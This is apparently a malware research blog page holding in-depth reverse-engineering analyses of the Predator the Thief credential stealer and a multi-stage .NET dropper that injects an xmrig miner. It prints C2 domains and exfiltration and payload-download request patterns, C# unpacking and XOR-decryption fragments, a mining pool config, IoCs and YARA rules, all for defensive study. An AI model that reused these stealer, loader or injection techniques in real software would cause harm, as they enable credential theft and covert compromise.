πŸ”’
There are new articles available, click to refresh the page.
Before yesterdayMalware

Predator The Thief: In-depth analysis (v2.3.5)

15 October 2018 at 13:46
By: fumko

Well, it’s been a long time without some fresh new contents on my blog. I had some unexpected problems that kept me away from here and a lot of work (like my tracker) that explain this. But it’s time to come back (slowly) with some stuff.

So today, this is an In-Depth analysis of one stealer: β€œPredator the thief”, written in C/C++. Like dozen others malware, it’s a ready to sell malware delivered as a builder & C2 panel package.

The goal is to explain step by step how this malware is working with a lot of extra explanations for some parts. This post is mainly addressed for junior reverse engineers or malware analysts who want for future purposes to understand and defeat some techniques/tricks easily.

So here we go!

Classical life cycle

The execution order is almost the same, for most of the stealers nowadays. Changes are mostly varying between evading techniques and how they interact with the C2.Β  For example, with Predator, the set up is quite simple but could vary if the attacker set up a loader on his C2.

Diagram

The life cycle of Predator the thief

Preparing the field

Before stealing sensitive data, Predator starts by setting up some basics stuff to be able to work correctly. Almost all the configuration is loaded into memory step by step.

EntryPoint

So let’s put a breakpoint at β€œ0x00472866” and inspect the code…

Call_Setup

  1. EBX is set to be the length of our loop (in our case here, it will be 0x0F)
  2. ESI have all functions addresses storedESI_Addresses
  3. EAX, will grab one address from ESI and moves it into EBP-8
  4. EBP is called, so at this point, a config function will unpack some data and saved it into the stack)
  5. ESI position is now advanced by 4
  6. EDI is incremented until reaching the same value as stored EBX
  7. When the EDI == EBX, it means that all required configuration values are stored into the stack. The main part of the malware could start

So, for example, let’s see what we haveΒ  inside 0040101D at 0x00488278

So with x32dbg, let’s see what we have… with a simple command

Command: go 0x0040101D

As you can see, this is where the C2 is stored, uncovered and saved into the stack.

C2

So what values are stored with this technique?

  • C2 Domain
  • %APPDATA% Folder
  • Predator Folder
  • temporary name of the archive predator file and position
  • also, the name of the archive when it will send to the C2
  • etc…

With the help of the %APPDATA%/Roaming path, the Predator folder is created (\ptst). Something notable with this is that it’s hardcoded behind a Xor string and not generated randomly. By pure speculation, It could be a shortcut for β€œPredator The STealer”.

This is also the same constatation for the name of the temporary archive file during the stealing process: β€œzpar.zip”.

The welcome message…

When you are positioned at the main module of the stealer, a lovely text looped over 0x06400000 times is addressed for people who want to reverse it.

welcome

Obfuscation Techniques

The thief who loves XOR (a little bit too much…)

Almost all the strings from this stealer sample are XORed, even if this obfuscation technique is really easy to understand and one of the easier to decrypt. Here, its used at multiple forms just to slow down the analysis.

GetProcAddress Alternatives

For avoiding to call directly modules from different libraries, it uses some classic stuff to search step by step a specific API request and stores it into a register. It permits to hide the direct call of the module into a simple register call.

So firstly,Β  aΒ XORed string (a DLL) is decrypted.Β  So for this case, the kernel32.dll is required for the specific module that the malware wants to call.

Step_1_API

When the decryption is done, this library is loaded with the help of β€œLoadLibraryAβ€œ. Then, a clear text is pushed into EDX: β€œCreateDirectoryAβ€œβ€¦ This will be the module that the stealer wants to use.

The only thing that it needs now, its to retrieve the address of an exported function β€œCreateDirectoryA” from kernel32.dll. Usually, this is done with the help of GetProcAddressΒ but this function is in fact not called and another trick is used to get the right value.

Step_2_API

So this string and theΒ IMAGE_DOS_HEADERΒ of kernel32.dll are sent into β€œfunc_GetProcesAddress_0”. The idea is to get manually the pointer of the function address that we want with the help of the Export Table. So let’s see what we have in the in it…

struct IMAGE_EXPORT_DIRECTORY {
	long Characteristics;
	long TimeDateStamp;
	short MajorVersion;
	short MinorVersion;
	long Name;
	long Base;
	long NumberOfFunctions;
	long NumberOfNames;
	long *AddressOfFunctions;    <= This good boy
	long *AddressOfNames;        <= This good boy 
	long *AddressOfNameOrdinals; <= This good boy
}

After inspecting the structure de IMAGE_EXPORT_DIRECTORY, three fields are mandatory :

  • AddressOfFunctions – An Array who contains the relative value address (RVA) of the functions of the module.
  • AddressOfNames – An array who stores with the ascending order of all functions from this module.
  • AddressOfNamesOrdinals – An 16 bits array who contains all the associated ordinals of functions names based on the AddressOfNames.

source

So after saving the absolute position of these 3 arrays, the loop is simple

Function_Get

  1. Grab the RVA of one function
  2. Get the name of this function
  3. Compare the string with the desired one.

So let’s see in details to understand everything :

If we dig into ds:[eax+edx*4], this where is stored all relative value address of the kernel32.dll export table functions.

RVA
With the next instructionΒ add eax,ecx. This remains to go at the exact position of the string value in the β€œAddressOfNames” array.

DLLBaseAddress + AddressOfNameRVA[i] = Function Name 
   751F0000    +       0C41D4        = CreateDirectoryA

Address of names

The comparison is matching,Β  now it needs to store the β€œprocAddress.Β  So First the Ordinal Number of the function is saved. Then with the help of this value, the Function Address position is grabbed and saved into ESI.

ADD           ESI, ECX
ProcAddress = Function Address + DLLBaseAddress

In disassembly, it looks like this :

GetProcAddress

Let’s inspect the code at the specific procAddress…

Check_01

Step_END_API

So everything is done, the address of the function is now stored into EAX and it only needs now to be called.

Anti-VM Technique

Here is used a simple Anti-VM Technique to check if this stealer is launched on a virtual machine. This is also the only Anti-Detection trick used on Predator.

Anti_VM_01

First, User32.dll (Xored) is dynamically loaded with the help of β€œLoadLibraryAβ€œ, Then β€œEnumDisplayDevicesA” module is requested with the help of User32.dll. The idea here is to get the value of the β€œDevice Description” of the current display used.

When it’s done, the result is checked with some values (obviously xored too) :

  • Hyper-V
  • VMware
  • VirtualBox

regedit_hyperv

If the string matches, you are redirected to a function renamed here β€œfunc_VmDetectedGoodBye.

How to By-Pass this Anti-VM technique?

For avoiding this simple trick, the goal is to modify the REG_SZ value of β€œDriverDesc” into {4d36e968-e325-11ce-bfc1-08002be10318} to something else.

regedit_bypass

And voilΓ !

Troll

Stealing Part

Let’s talk about the main subject… How this stealer is organized… As far I disassemble the code, this is all the folders that the malware is setting on the β€œptst” repository before sending it as an archive on the C2.

  • Folder
    • Files: Contains all classical text/documents files at specifics paths
    • FileZilla: Grab one or two files from this FTP
    • WinFTP: Grab one file from this FTP
    • Cookies: Saved stolen cookies from different browsers
    • General: Generic Data
    • Steam: Steal login account data
    • Discord: Steal login account data
  • Files
    • Information.log
    • Screenshot.jpeg <= Screenshot of the current screen

Telegram

For checking if Telegram is installed on the machine, the malware is checking if the KeyPath β€œSoftware\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1” exists on the machine.

So let’s inspect what we have inside this β€œKeyPath”?Β After digging into the code, the stealer will request the value of β€œInstallLocation” because of this where Telegram is installed currently on the machine.

Install

Step by step, the path is recreated (also always, all strings are xored) :

  • %TELEGRAM_PATH%
  • \Telegram Desktop
  • \tdata
  • \D877F783D5D3EF8C

map file

The folder β€œD877F783D5D3EF8C” is where all Telegram cache is stored. This is the sensitive data that the stealer wants to grab. Also during the process, the file map* (i.e: map1) is also checked and this file is, in fact, the encryption key. So if someone grabs everything for this folder, this leads the attacker to have an access (login without prompt) into the victim account.

Steam

The technique used by the stealer to get information for one software will remain the same for the next events (for most of the cases). This greatly facilitates the understanding of this malware.

So first, it’s checking the β€œSteamPath” key value at β€œHKCU\Software\Valve\Steam” to grab the correct Steam repository. This value is after concatenating with a bunch of files that are necessary to compromise a Steam Account.

So it will check first if ssfn files are present on the machine with the help of β€œfunc_FindFiles”, if it matches, they are duplicated into the temporary malware folder stored on %APPDATA%/XXXX. Then do the same things with config.vdf

XOR_3

So what the point with these files? First, after some research, a post on Reddit was quite interesting. it explained that ssfn files permit to by-pass SteamGuard during the user log-on.

Steam

Now what the point of the second file? this is where you could know some information about the user account and all the applications that are installed on the machine. Also, if the ConnectCache field is found on this one, it is possible to log into the stolen account without steam authentication prompt. if you are curious, this pattern is represented just like this :

"ConnectCache"
{
Β  Β  Β  Β "STEAM_USERNAME_IN_CRC32_FORMAT" "SOME_HEX_STUFF"
}

The last file, that the stealer wants to grab is β€œloginusers.vdf”. This one could be used for multiple purposes but mainly for setting the account in offline mode manually.

XOR_4

For more details on the subject there a nice report made by Kapersky for this:

Wallets

The stealer is supporting multiple digital wallets such as :

  • Ethereum
  • Multibit
  • Electrum
  • Armory
  • Bytecoin
  • Bitcoin
  • Etc…

The functionality is rudimentary but it’s enough to grab specific files such as :

  • *.wallet
  • *.dat

And as usual, all the strings are XORed.

Wallet

FTP software

The stealer supports two FTP software :

  • Filezilla
  • WInFTP

It’s really rudimentary because he only search for three files, and they are available a simple copy to the predator is done :

  • %APPDATA%\Filezilla\sitemanager.xml
  • %APPDATA%\Filezilla\recentservers.xml
  • %PROGRAMFILES%\WinFtp Client\Favorites.dat

Browsers

It’s not necessary to have some deeper explanation about what kind of file the stealer will focus on browsers. There is currently a dozen articles that explain how this kind of malware manages to steal web data. I recommend you to read this articleΒ made by @coldshell about an example of overview and well detailed.

As usual, popular Chrome-based & Firefox-based browsers and also Opera are mainly targeted by Predator.

This is the current official list supported by this stealer :

  • Amigo
  • BlackHawk
  • Chromium
  • Comodo Dragon
  • Cyberfox
  • Epic Privacy Browser
  • Google Chrome
  • IceCat
  • K-Meleon
  • Kometa
  • Maxthon5
  • Mozilla Firefox
  • Nichrome
  • Opera
  • Orbitum
  • Pale Moon
  • Sputnik
  • Torch
  • Vivaldi
  • Waterfox
  • Etc…

This one is also using SQLite for extracting data from browsers and using and saved them into a temporary file name β€œvlmi{lulz}yg.col”.

sqlite

So the task is simple :

  • Stole SQL Browser file
  • Extract data with the help of SQLite and put into a temporary file
  • Then read and save it into a text file with a specific name (for each browser).

cookies

When forms data or credentials are found they’re saved into two files on the General repository :

  • forms.log
  • password.log
  • cards.log

General

Discord

If discord is detected on the machine, the stealer will search and copy the β€œhttps_discordapp_*localstorage” file into the β€œptst” folder.Β This file contains all sensitive information about the account and could permit some authentication without a prompt login if this one is pushed into the correct directory of the attacker machine.

Discord_Part1Discord_Part2Discord_Part3

Predator is inspecting multiple places…

This stealer is stealing data from 3 strategical folders :

  • Desktop
  • Downloads
  • Documents

Each time, the task will be the same, it will search 4 type of files with the help of GetFileAttributesA :

  • *.doc
  • *.docx
  • *.txt
  • *.log

When it matches, they have copied into a folder named β€œFiles”.

Information.log

When tasks are done, the malware starts generating a summarize file, who contains some specific and sensitive data from the machine victim beside the file β€œInformation.log”. For DFIR, this file is the artifact to identify the name of the malware because it contains the name and the specific version.

So first, it writes the Username of the user that has executed the payload, the computer name, and the OS Version.

User name: lolilol
Machine name: Computer 
OS version: Windoge 10

Then copy the content of the clipboard with the help of GetClipBoardData

Current clipboard: 
-------------- 
Omelette du fromage

Let’s continue the process…

Startup folder: C:\Users\lolilol\AppData\Local\Temp\predator.exe

Some classic specification about the machine is requested and saved into the file.

CPU info: Some bad CPU | Amount of kernels: 128 (Current CPU usage: 46.112917%) 
GPU info: Fumik0_ graphical display 
Amount of RAM: 12 GB (Current RAM usage: 240 MB) 
Screen resolution: 1900x1005

Then, all the user accounts are indicated

Computer users: 
lolilol 
Administrator 
All Users 
Default 
Default User 
Public

The last part is about some exotics information that is quite awkward in fact… Firstly, for some reasons that I don’t want to understand, there is the compile time hardcoded on the payload.

Compile Time

Then the second exotic data saved into Information.log is the grabbing execution time for stealing contents from the machine… This information could be useful for debugging some tweaks with the features.

Additional information:
Compile time: Aug 31 2018
Grabbing time: 0.359375 second(s)

C2 Communications

For finishing the information.log, a GET request is made for getting some network data about the victim…

First, it set up the request by uncovered some Data like :

  • A user-agent
  • The content-type

UA

  • The API URL ( /api/info.get )

We can have for example this result :

Amsterdam;Netherlands;52.3702;4.89517;51.15.43.205;Europe/Amsterdam;1012;

When the request is done, the data is consolidated step by step with the help of different loops and conditions.

GET01

When the task is done, there are saved into Information.log

City: Nopeland 
Country:  NopeCountry
Coordinates: XX.XXXX N, X.XXXX W 
IP: XXX.XXX.XXX.XXX 
Timezone: Nowhere 
Zip code: XXXXX

The Archive is not complete, it only needs for the stealer to send it to the C2.

zpar.zip

So now it set up some pieces of information into the gate.get request with specifics arguments, from p1 to p7, for example :

  • p1: Number of accounts stolen
  • p2: Number of cookies stolen
  • p4: Number of forms stolen
  • etc…

results :

Request

The POST request is now complete, the stealer will clean everything and quit.

Panel_C2_Example

Example of Predator C2 Panel with fancy background…

Update – v2.3.7

So during the analysis,Β  new versions were pushed… Currently (at the time where this post was redacted), the v3 has been released, but without possession of this specific version, I won’t talk anything about it and will me be focus only on the 2.3.7.

It’s useless to review from scratch, the mechanic of this stealer is still the same, just some tweak or other arrangements was done for multiple purposes… Without digging too much into it, let’s see some changes (not all) that I found interesting.

changelog

Changelog of v2.3.7 explained by the author

As usual, this is the same patterns :

  • Code optimizations (Faster / Lightweight)
  • More features…

As you can see v2.3.7 on the right is much longer than v2.3.5 (left), but the backbone is still the same.

Mutex

On 2.3.7,Β  A mutex is integrated with a specific string called β€œSyystemServs”

Xor / Obfuscated Strings

XOR_v2

During the C2 requests, URL arguments are generated byte per byte and unXOR.

For example :

push 04
...
push 61
...
push 70
...
leads to this 
HEX    : 046170692F676174652E6765743F70313D
STRING : .api/gate.get?p1=

This is basic and simple but enough to just slow down the review of the strings. but at least, it’s really easy to uncover it, so it doesn’t matter.

This tweak by far is why the code is much longer than v2.3.5.

Loader

Not seen before (as far I saw), it seems on 2.3.7, it integrates a loader feature to push another payload on the victim machine, easily recognizable with the adequate GET Request

/api/download.get

The API request permits to the malware to get an URL into text format. Then Download and saved it into disk and execute it with the help of ShellExecuteA

Loader

There also some other tweaks, but it’s unnecessary to detail on this review, I let you this task by yourself if you are curious πŸ™‚

IoC

v2.3.5

  • 299f83d5a35f17aa97d40db667a52dcc | Sample Packed
  • 3cb386716d7b90b4dca1610afbd5b146 | Sample Unpacked
  • kent-adam.myjino.ru | C2 Domain

v2.3.7

  • Β cbcc48fe0fa0fd30cb4c088fae582118 | Sample Unpacked
  • Β denbaliberdin.myjino.ru | C2 Domain

HTTP Patterns

  • GETΒ  Β  –  Β /api/info.get
  • POSTΒ  –  /api//gate.get?p1=X&p2=X&p3=X&p4=X&p5=X&p6=X&p7=X
  • GETΒ  Β  –  /api/download.get

MITRE ATT&CK

v2.3.5

  • Discovery – Peripheral Device Discovery
  • Discovery – System Information Discovery
  • Discovery – System Time Discovery
  • Discovery – Query Registry
  • Credential Access – Credentials in Files
  • Exfiltration – Data Compressed

v2.3.7

  • Discovery – Peripheral Device Discovery
  • Discovery – System Information Discovery
  • Discovery – System Time Discovery
  • Discovery – Query Registry
  • Credential Access – Credentials in Files
  • Exfiltration – Data Compressed
  • Execution –  Execution through API

Author / Threat Actor

  • Alexuiop1337

Yara Rule

rule Predator_The_Thief : Predator_The_Thief {
    meta:
        description = "Yara rule for Predator The Thief v2.3.5 & +"
        author = "Fumik0_"
        date = "2018/10/12"
        update = "2018/12/19"

    strings:
        $mz = { 4D 5A }

        // V2
        $hex1 = { BF 00 00 40 06 } 
        $hex2 = { C6 04 31 6B }
        $hex3 = { C6 04 31 63 }
        $hex4 = { C6 04 31 75 }
        $hex5 = { C6 04 31 66 }
 
        $s1 = "sqlite_" ascii wide
 
        // V3
        $x1 = { C6 84 24 ?? ?? 00 00 8C } 
        $x2 = { C6 84 24 ?? ?? 00 00 1A }  
        $x3 = { C6 84 24 ?? ?? 00 00 D4 } 
        $x4 = { C6 84 24 ?? ?? 00 00 03 }  
        $x5 = { C6 84 24 ?? ?? 00 00 B4 } 
        $x6 = { C6 84 24 ?? ?? 00 00 80 }
 
    condition:
        $mz at 0 and 
        ( ( all of ($hex*) and all of ($s*) ) or (all of ($x*)))
}

Β 

Recommendations

  • Always running stuff inside a VM, be sure to install a lot of stuff linked to the hypervisor (like Guest Addons tools)Β  to trigger as much as possible all kind of possible Anti-VM detection and closing malware. When you have done with your activities stop the VM and restore it a Specific clean snapshot when it’s done.
  • Avoid storing files at a pre-destined path (Desktop, Documents, Downloads), put at a place that is not common.
  • Avoiding Cracks and other stupid fake hacks, stealers are usually behind the current game trendings (especially in those times with Fortnite…).
  • Use containers for software that you are using, this will reduce the risk of stealing data.
  • Flush your browser after each visit, never saved your passwords directly on your browser or using auto-fill features.
  • Don’t use the same password for all your websites (use 2FA and it’s possible), we are in 2018, and this still sadly everywhere like this.
  • Make some noise with your data, that will permit to lose some attacker minds to find some accurate values into the junk information.
  • Use a Vault Password software.
  • Troll/Not Troll:Β Learn Russian and put your keyboard in Cyrillic πŸ™‚

Conclusion

Stealers are not sophisticated malware, but they are enough effective to make some irreversible damage for victims. Email accounts and other credentials are more and more impactful and this will be worse with the years. Behaviors must changes for the account management to limit this kind of scenario. Awareness and good practices are the keys and this will not be a simple security software solution that will solve everything.

Well for me I’ve enough work, it’s time to sleep a little…

Himouto Habits

#HappyHunting

Update 2018-10-23 : Yara Rules now working also for v3

Some fun with a miner

21 May 2018 at 08:39
By: fumko

A few weeks ago I came across a malware that gave me some interests to dig more into it. It has a curious way to deploy itself, set up a miner on the machine and hide it behind some legit processes.

In an example, when we look at Process Hacker :

  • Visual Basic Compiler is launched without reasons
  • An awkward child process β€œNotepad.exe” is consuming a lot of CPU

process_hacker

At first glance, my first thought was β€œWhat the heck is going on thereΒ ?”

First stage

All begin with a sample available at this address :

hxxp://netload.trade/ghghdshch130.exe

This is a .NET application and startsΒ at this EntryPoint :

static void StatusBarPanelCollection(string[] args) {
	ToolStripItemEventArgs.ExprVisitorBase().EntryPoint.Invoke(null, null);
}

The first thing called behind is an Assembly method named ExprVisitorBase().

public static Assembly ExprVisitorBase() {
  CSharpCodeProvider csharpCodeProvider = new CSharpCodeProvider();
  CompilerResults compilerResults = csharpCodeProvider.CompileAssemblyFromSource(new CompilerParameters
    {
      IncludeDebugInformation = true,
      GenerateExecutable = false,
      GenerateInMemory = true,
      IncludeDebugInformation = true,
      ReferencedAssemblies = 
        {
          string.Format(.POasdIsd("U3lzdGVtLkRyYXdpbmcuZGxs"), new object[0])
        },
        CompilerOptions = string.Format(.POasdIsd("L29wdGltaXplKyAvcGxhdGZvcm06WDg2IC9kZWJ1ZysgL3RhcmdldDp3aW5leGU="), new object[0])
    }, new string[]
    {
      ToolStripItemEventArgs.SizeSoapParameterAttribute.Replace(string.Format(.POasdIsd("I3Jlc25hbWUj"), new object[0]), 
      .POasdIsd("ekp5blhVaktUbFpw")).Replace(string.Format(.POasdIsd("I3Bhc3Mj"), new object[0]), .POasdIsd("VVVlb0NvaXBHdVZj"))
    });
  return compilerResults.CompiledAssembly;
}

This program is going to programmatically compile some code. Indeed, it is possible in .NET to access to the C# compiler with the help of theΒ CSharpCodeProvider class.Β The call toΒ CompileAssemblyFromSourceΒ is where the assembly gets compiled. This method takes the parameters object (CompilerParameters) and the source code, which is a string.

First, if we look deeper into theΒ CompilerParameters object, the configuration let us understand that the new program will be a DLL file and there will be no trace on disk. It will require a specific reference to being able to work, but the string is obfuscated and required β€œPOasdIsd” to be decoded.

internal class 
{
 	public static string POasdIsd(string string_0)
	{
		byte[] bytes = Convert.FromBase64String(string_0);
		return Encoding.UTF8.GetString(bytes);
	}
}

It’s easy to understand β€œPOasdIsd” is just a Base64decode function, and our encoded string is, in fact, the word β€œSystem.Drawing.dll”. So this means, this reference is required to compile the source code.

If we continue the analysis, it sets some compiler argument. decoded, this will be compiled in debug mode for an x86 platform :

/optimize+ /platform:X86 /debug+ /target:winexe

So now, the only thing needed is the source code and it’s stored in the variable SizeSoapParameterAttribute, which is of course also obfuscated by a Base64 encoding and additionally encrypted with a XOR key (5).

public static string SizeSoapParameterAttribute = 
    ToolStripItemEventArgs.ASSEMBLY_FLAGS(
        .POasdIsd("cHZsa2IlVnx2c ... D4ID3gPeCUID3g="), 5
);

If we place some breakpoint on the debugger we can see step by step, the generated c# source code

Generating_cs

Give me my source code, please…

When everything is done, the compilation could be done. We can see that with Process Monitor.

procmon.png

Second stage

At this state, the DLL is compiled and loaded on memory. No need to extract and decompiled it because we have the code! So if we look deeper into it, this file contains a lot of spaghetti code, but the main class is easy to find.

Second_code.png

When we rename some function, it’s clearer to understand the goal of this library.

private static string xorKey = "UUeoCoipGuVc";
private static byte[] Payload;

...

private static void Main()
{
  try
  {
    IntPtr hResInfo = Program.FindResource(new IntPtr(0), new IntPtr(138), new IntPtr(23));
    uint size = Program.SizeofResource(new IntPtr(0), hResInfo);
    IntPtr hResData = Program.LoadResource(new IntPtr(0), hResInfo);
    IntPtr source = Program.LockResource(hResData);
    Program.Payload = new byte[size];
    Marshal.Copy(source, Program.Payload, 0, Convert.ToInt32(num));
    Program.Payload = Program.XOR(Program.ConvertFromBmp(Program.Byte2Image(Program.Payload)));
    Thread thread = new Thread(new ThreadStart(Program.AssemblyLoader));
    thread.Start();
  }
  catch
  {
  }
}

So when it’s loaded into memory. It will request an HTML resource (IntPtr(23) isΒ RT_HTML) of the main program, so if you debug this DLL on DNspy, it will crash because it will target a resource that does not exist on it. So let’s go back a bit on β€œghghdshch130.exe” and inspect .rsrc. We have a curious file with named 138 (which is the Resource ID)

138 RT

So if we inspect it, this is a PNG file, with aΒ 461 x 461 dimension, 8-bit/color RGBA, non-interlaced.

Image.png

So now lets the magic happen… With the code seen as above, this image is converted into a byte array and then again into an image (Bitmap format). The main reason here,Β  its to be able to use ConvertFromBmp, the most important function of the DLL file. The goal is to reorganized properly into memory, the different sections of the payload with the help of BlockCopy. So it will copy pixel per pixel on the correct destination offset with a 4 bytes buffer each time.

I clean the code to understand clearly the steps.

private static byte[] ConvertFromBmp(Bitmap imageFile) { 
 int width = imageFile.Width; 
 int correctSize = width * width * 4; 
 byte[] correctOffset = new byte[correctSize]; 
 int size = 0; 
 for (int x = 0; x < width; x++) { 
   for (int y = 0; y < width; y++) { 
     Buffer.BlockCopy(BitConverter.GetBytes(imageFile.GetPixel(x, y).ToArgb()), 0, correctOffset, size, 4); 
     size += 4; 
   } 
 }

 int finalSize = BitConverter.ToInt32(array, 0); 
 byte[] XorPayload = new byte[finalSize]; 
 Buffer.BlockCopy(correctOffset, 4, XorPayload, 0, XorPayload.Length); 
 
 return XorPayload; 
}

So now, our payload is almost done, it has just be decrypted with a specific xor key, in this case, its the value β€œUUeoCoipGuVc”

internal class Program
{
private static byte[] XOR(byte[] bytes)
{
  byte[] bytes2 = Encoding.Unicode.GetBytes(Program.XorString);
  for (int i = 0; i < bytes.Length; i++)
  {
  int num = i;
  bytes[num] ^= bytes2[i % 16];
  }
  return bytes;
}

When the payload is β€œfinally” created, the assembly object is loaded into a thread.

Thread thread = new Thread(new ThreadStart(Program.AssemblyLoader)); 
thread.Start();

Third Stage

So if you believe that everything is done. Well, unfortunately, you are very wrong ! This is packed/obfuscated… again!

throw.gif

Without entering into some madness to understand the code, IΒ note that there are three files right now in the resource folder.

resources.png

Two of them are XOR encrypted payloads and one is a text file with Base64 encoded strings. When we look into the β€œshitty” code to understand what is the purpose of the text file, this is in fact, a Manifest Resource Stream, a content that is embedded in the assembly at compile time. With some lines of python code, let’s see what we have when everything is decoded :

 => python3 manifest.py 
...
'RSRCNAME'
'RSRCPWD'
'Dotwall Evaluation'

The last entry is pretty interesting because it shows us that this stage is in fact packed with Dotwall, a .NET obfuscator that is not available on the public on this day (or it looks like).

So what is the goal of this stage?

First, it copies the first stage on the main user directory and keeps the new path into memory for future purposes. Then delete the alternate stream nameΒ Zone.Identifier of this file, so it permits here, to erase its traces to confirm this malware was downloaded from the outside network.

Then it sets a persistence trick with an Internet Shortcut file created on Windows startup menu named β€œrTErod.urlβ€β€˜, which could probably explain why the Zone.Identifier task was done above.

[InternetShortcut]
URL=file:///C:/Users/user/bsdsjdpjcqdpcdq.exe

Then, it searches if the visual basic compiler is present on the machine, and inject the resource β€œrWyMgsOzOKRu” into it. To simplify the way how the program decrypts this file, with all the interaction of different classes and the manifest that leads us to hundreds line of code, I could summarize this with just 10 lines of C# source code.

byte[] buffer = File.ReadAllBytes("xplACLWqdLvY"); // Xor Key 
byte[] bytes = Encoding.Unicode.GetBytes("rWyMgsOzOKRu"); // Encrypted Payload

for (int i = 0; i < buffer.Length; i++) {
Β  Β  buffer[i] ^= bytes[i % 16];
}

using (var decrypted = new FileStream("decrypted_resource.exe", FileMode.Create, FileAccess.Write)) {
 decrypted.Write(bytes, 0, byteArray.Length);
}Β  Β  Β  Β 

this Assembly is named β€œadderalldll” and remains to Adderall Protector.

AdderallDll.png

adderall_logo.png

adderall_topics

After some cleaning, this tool is called by using some reflection.Β  The run() method of the new Object class (Adderall) is invoked with some additional arguments in entries:

  • @”C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe”
  • β€œβ€
  • DecryptPayload(cryptedResource) // <= Our Final Unpacked Malware
  • true
Type Adderall_resource = exportedTypes[pos];
object Adderall = Activator.CreateInstance(Adderall_resource);
vbcPath = @"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe";

Adderall_resource.InvokeMember("run", BindingFlags.InvokeMethod, null, Adderall, new object[] {
 vbcPath, 
 "",      
 DecryptPayload(cryptedResource), 
 true 
});

Fourth Stage

So what we have into the adderall.dll? Well… This is obfuscated with Dotwall and It looks like there are no embedded payload resources, just the manifest stream file. It means that we are very close to our final miner malware!

adderall_rsrc

So let’s see what we have again on the decoded Manifest :

=> python3 manifest.py 
...
'kernel32'
'CreateProcessA'
'kernel32'
'GetThreadContext'
'kernel32'
'Wow64GetThreadContext'
'kernel32'
'SetThreadContext'
'kernel32'
'Wow64SetThreadContext'
'kernel32'
'ReadProcessMemory'
'kernel32'
'WriteProcessMemory'
'ntdll'
'NtUnmapViewOfSection'
'kernel32'
'VirtualAllocEx'
'kernel32'
'ResumeThread'
...
'Dotwall Evaluation'

Typically, we understand thatΒ the goal here its execute some process injection and the process vbc.exe will host the malware.

Fifth Stage

So now, that our miner is finally deployed, let’s do some analysis on it. The first thing that we see here is that this one is developed in C/C++.

The malware is checking if it’s running on 32 or 64 bits with the help of IsWow64Process and will decide where it will do some process injection:

  • If it’s 32 bits, the miner will be behind wuapp.exe
  • If it’s 64 bits, the miner will be behind notepad.exe

process_choice.png

As below, this is an example of a process injection of notepad.exe behind Winrar.exe, a child process of explorer.exe

Process Injection

It looks like that we have here an xmrig miner at reading the command line if we check directly on the help display, its identical.

  -a, --algo=ALGO          cryptonight (default) or cryptonight-lite
  -o, --url=URL            URL of mining server
  -O, --userpass=U:P       username:password pair for mining server
  -u, --user=USERNAME      username for mining server
  -p, --pass=PASSWORD      password for mining server
  -t, --threads=N          number of miner threads
...
  -c, --config=FILE        load a JSON-format configuration file
...

To confirm if it’s this specific miner, let’s dump memory on base address 0x400000 :

Notepad_Miner

Our PE header is erased and compressed with UPX

UPX_xmrig.png

…and with a quick search, our xmrig miner is right here πŸ™‚

miner_xmrig.png

Miner config Setup

The malware is generating a specific xmrig config file for the victim machine. First, it pushed the miner pool and the user account.

xmrig

Then, the typical xmrig config file is generated and saved into two files β€œcfg” and cfgi”.

config_file.png

In this example, the output config file is this :

{{ "algo": "cryptonight", "background": false, "colors": true, "retries": 5, "retry-pause": 5, "syslog": false, "print-time": 60, "av": 0, "safe": false, "cpu-priority": null, "cpu-affinity": null, "threads": 1, "pools": [ { "url": "xmr.pool.minergate.com:45560", "user": "[email protected]", "pass": "x", "keepalive": false, "nicehash": false } ], "api": { "port": 0, "access-token": null, "worker-id": null }}
Persistence

Another persistence is also added at this step, a registry key is created and this entry is periodically checked.

registry

The executable file linked with the registry is in the same folder with the miner configurations and this is a legit vbc.exe process πŸ™‚

appdata

So at the end, you are here…

legit_vbc
Hiding Method

This malware checks if the task manager is launched.

FindTaskMgrExe

if it matches, it will shutdown notepad.exe process, if the miner is currently executed. Then, the miner will not restart it again as long as taskmgr is still opened.

kill_notepad.png

Summary

  1. We have an executable who compiled and injected itself a DLL
  2. This DLL deploys another executable which was behind a fake PNG file and was also injected into the first payload
  3. In this program, a DLL named Adderall is Invoked, this permits to deploy the unpacked malware into visual basic compiler with the help of RunPE
  4. Our final malware will set up a miner config and injectsΒ xmrig into a notepad.exe or wuapp.exe (according to a 32 or 64 bits Operating System).

DU-IJlvXUAUrBRu.jpg

Yara rules

Xmrig Miner Malware

rule XmrigMinerMalware {
    meta:
        description = "Xmrig Miner Malware"
        author = "Fumik0_"
        date = "2018/05/13"
    strings:
        $mz = "MZ"

        $s1 = "\\cfg" wide ascii
        $s2 = "\\cfgi" wide ascii
        $s3 = "\\notepad.exe" wide ascii
        $s4 = "\\wuapp.exe" wide ascii
        $s5 = "--show-window" wide ascii
        $s6 = "taskmgr.exe" wide ascii
        $s7 = "Miner" wide ascii
    condition:
        $mz at 0 and all of ($s*) 
}

Adderall Protector

rule Adderall {
    meta:
        description = "Adderall Protector"
        author = "Fumik0_"
        date = "2018/05/13"
    strings:
        $mz = "MZ"

        $n1 = "#Blob" wide ascii
        $n2 = "#GUID" wide ascii
        $n3 = "#Strings" wide ascii

        $s1 = "adderalldll" wide ascii
    condition:
        $mz at 0 and (all of ($n*) and $s1)
}

Dotwall Obfuscator

rule DotWall {
    meta:
        description = "Dotwall Obfuscator"
        author = "Fumik0_"
        date = "2018/05/13"
    strings:
        $mz = "MZ"

        $n1 = "#Blob" wide ascii
        $n2 = "#GUID" wide ascii
        $n3 = "#Strings" wide ascii

        $s1 = "RG90d2Fsb" wide ascii
    condition:
        $mz at 0 and (
            all of ($n*) and $s1
        )
}

IoC

[email protected] _

517AC5506A5488A1193686F66CB57AD3288C2258C510004EDB2F361B674526CC
AA28AA381B935EB98A6B3DEC4C86E1570EF142B041DB4255445C52A81F57A02F
40F5D5BBC054BA193B3D46BA1AE113AC9C9FCAFDDEC52CF02F82C4A22BF9F15F
0C5FC323873FBE693C1FF860282F035AD447050F8EC37FF2E662D087A949DFC9
7C23DA75BA54998363C4E278488F05588FB4E7D8201CCDAA870DD93F0328B911
BECDCC441E29D518D2258F0718000EBD0848ADB4CEFA00223F386A91FDB11677

Conclusion

This miner was pretty cool to reverse for using differents techniques. Good time (and some headaches) to explain and understand the different tasks.

Happy Hunting

Happy Hunting!

APT Encounters of the Third Kind

24 March 2021 at 04:00

